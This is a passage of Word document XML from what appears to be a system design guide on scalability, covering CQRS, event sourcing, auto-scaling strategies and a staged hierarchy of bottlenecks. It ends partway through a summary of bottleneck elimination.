        <w:t>CQRS (Command Query Responsibility Segregation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB3CD8D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Traditional architectures use the same data model for reads and writes. Under high load, reads and writes compete for the same database resources. CQRS separates them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE16AD8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command side (writes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CCCB65" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Receives commands (actions that change state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A39CF5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Validates the command against business rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C956D8" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Updates the write model (normalized relational data, optimized for writes and consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42156F6A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Emits domain events representing what changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B601245" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query side (reads):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA9B5F6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Listens to domain events from the write side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6707C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Maintains </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>read models</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — denormalized, pre-computed views optimized for specific read patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E06483F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>May have multiple read models for different access patterns (e.g., one model for user profile display, another for analytics, another for full-text search).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E74D3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t>Can scale independently of the write side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4979F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The scaling benefit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Read and write databases can be scaled independently. Read replicas, caching, and denormalized read models handle read load without affecting write performance. The write database stays lean and optimized for transactional integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285987DA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cost:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Eventual consistency between write and read models.</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> After a write, the domain event propagates to the read model asynchronously — there's a brief window where reads return stale data. For most applications, this is acceptable. For operations where you need to read your own writes immediately (e.g., user updates their profile and expects to see the change), you need special handling (read from write model for that user's own data, or optimistic cache updates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD8EEA" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event Sourcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C205CE2" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Instead of storing current state, store </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>the full history of events</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> that led to the current state. Current state is computed by replaying events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40981495" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scaling implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255A60BD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Append-only writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — the event log only grows. No UPDATE or DELETE operations on the event store. Append-only structures are maximally efficient for writes and trivially replicated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173DE683" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Temporal queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — "what was the state of this account at 3pm yesterday?" is trivial — replay events up to that timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0FDBE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Audit trail</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — every state change is recorded with who made it, when, and why.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D326CF" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Event log as integration point</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — downstream services subscribe to the event log (via Kafka or similar) and maintain their own projections. This is the natural complement to CQRS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0984A34D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The snapshot optimization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Replaying 10 years of events to compute current state is expensive. Periodically take a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> — serialize current state at a given event position. On load, restore from the most recent snapshot, then replay only events after the snapshot. This bounds replay time regardless of total event history length.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40797B1E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="420CAF07">
          <v:rect id="_x0000_i2434" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7505F1" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>13. Auto-Scaling — Dynamic Capacity Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1771B270" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reactive Auto-Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD73BE4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scale out when metrics exceed thresholds, scale in when they drop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F21856C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The scale-out lag problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Auto-scaling isn't instantaneous. A new EC2 instance takes 2–5 minutes to boot, pass health checks, and receive traffic. During a sudden traffic spike, the system is under-provisioned for </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2–5 minutes</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> before new capacity comes online. During those minutes: latency spikes, errors occur, cascading failures may begin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44087A25" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation — predictive pre-scaling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Use historical traffic patterns (known daily peaks, weekly cycles, scheduled events) to </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>scale before</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> demand arrives. Scale out 10 minutes before the Monday 9am traffic surge rather than waiting for the surge to trigger scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1442A54D" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigation — always maintain headroom:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Never run at 100% capacity. Auto-scaling triggers at 60–70% CPU. This means at 70% CPU, new instances start provisioning. By the time they come online (2–5 minutes), CPU hasn't yet reached 100% (assuming traffic grows at a normal rate). The 30% headroom is the buffer that keeps the system healthy during scale-out lag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC35DD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scale-in conservatism:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Scale-in (removing instances) should be much slower and more conservative than scale-out. Scaling in prematurely and then having to scale back out is worse than over-provisioning slightly. Common pattern: scale out immediately at threshold, scale in only after sustained low utilization for 10–15 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443B56A5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Predictive Auto-Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3377DF58" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Machine learning models predict future load based on historical patterns and current signals. AWS Predictive Scaling, for example, uses your historical CloudWatch metrics to train a model that predicts future demand and pre-scales capacity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BFFFEC" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>The model learns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C9C91E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Daily patterns (traffic peaks at 9am, 12pm, 5pm).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10354936" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Weekly patterns (weekday vs weekend traffic differences).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674650C4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Seasonal patterns (holiday traffic surges).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F95593B" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:t>Responses to scheduled events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8CE0BB" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Predictive scaling combined with reactive scaling handles both </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anticipated load</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (scale predictively) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unexpected spikes</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (scale reactively).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A965DE6" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="7BA37B7A">
          <v:rect id="_x0000_i2435" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="459CECB0" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. The Scalability Bottleneck Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3030F541" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>In practice, scalability bottlenecks appear in a predictable order as systems grow. Understanding this hierarchy guides where to invest:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613D85DE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stage 1 (0 → 10K RPS): Single Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Database is the bottleneck. Add indexes, optimize queries, add read replicas, add caching. The application server rarely bottlenecks at this scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10458BE3" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stage 2 (10K → 100K RPS): Database Read Bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Read replicas are saturating. The cache hit ratio isn't high enough. Solutions: improve cache hit ratio (better TTLs, better cache key design), add more read replicas, consider denormalization to reduce query complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57144F11" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stage 3 (100K → 1M RPS): Database Write Bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> A single primary can't handle write volume. Solutions: sharding, write-optimized storage (LSM-tree based databases), CQRS to separate write path from read path, event-driven architecture to defer non-critical writes asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412A2394" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Stage 4 (1M+ RPS): Network and Coordination Bottleneck</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> Distributed coordination (leader election, distributed locks, consensus) becomes expensive. Network fan-out for scatter-gather queries dominates latency. Solutions: reduce coordination (design for local decisions), reduce fan-out (better data locality via improved sharding), push computation to edge (CDN edge computing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3CDE5" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The recurring theme at every stage:</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> The bottleneck is always a </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shared, contended resource</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t>. The solution is always to either </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>eliminate the sharing</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (partition data, isolate failure domains, route requests locally) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>reduce the contention</w:t>
      </w:r>
      <w:r w:rsidRPr="00433B4B">
        <w:t> (caching, async processing, pre-computation). Every scalability pattern is a variation of this principle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1E779A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:pict w14:anchorId="49C4F2A7">
          <v:rect id="_x0000_i2436" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDF0545" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00433B4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD9F5FD" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BEE785" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t>Scalability = Systematic Bottleneck Elimination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C48F7E" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B"/>
    <w:p w14:paraId="2DC194C4" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Step 1: Measure — identify the actual current bottleneck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7674E6C9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">          (not the assumed bottleneck — measure with profiling and metrics)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6A713" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4904800F" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Step 2: Eliminate — apply the appropriate pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB1988A" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">          CPU bound     → horizontal scale, optimize algorithms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5435BED9" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">          Memory bound  → caching, working set reduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE76712" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          I/O bound     → async I/O, caching, SSD, read replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4469E805" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">          Network bound → CDN, edge computing, data locality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF6D06C" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">          Lock/contention → sharding, lock-free structures, async processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A69972" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42599EEE" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  Step 3: Verify — confirm the bottleneck moved (not eliminated — it always moves)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0332D553" w14:textId="77777777" w:rsidR="00433B4B" w:rsidRPr="00433B4B" w:rsidRDefault="00433B4B" w:rsidP="00433B4B">
      <w:r w:rsidRPr="00433B4B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
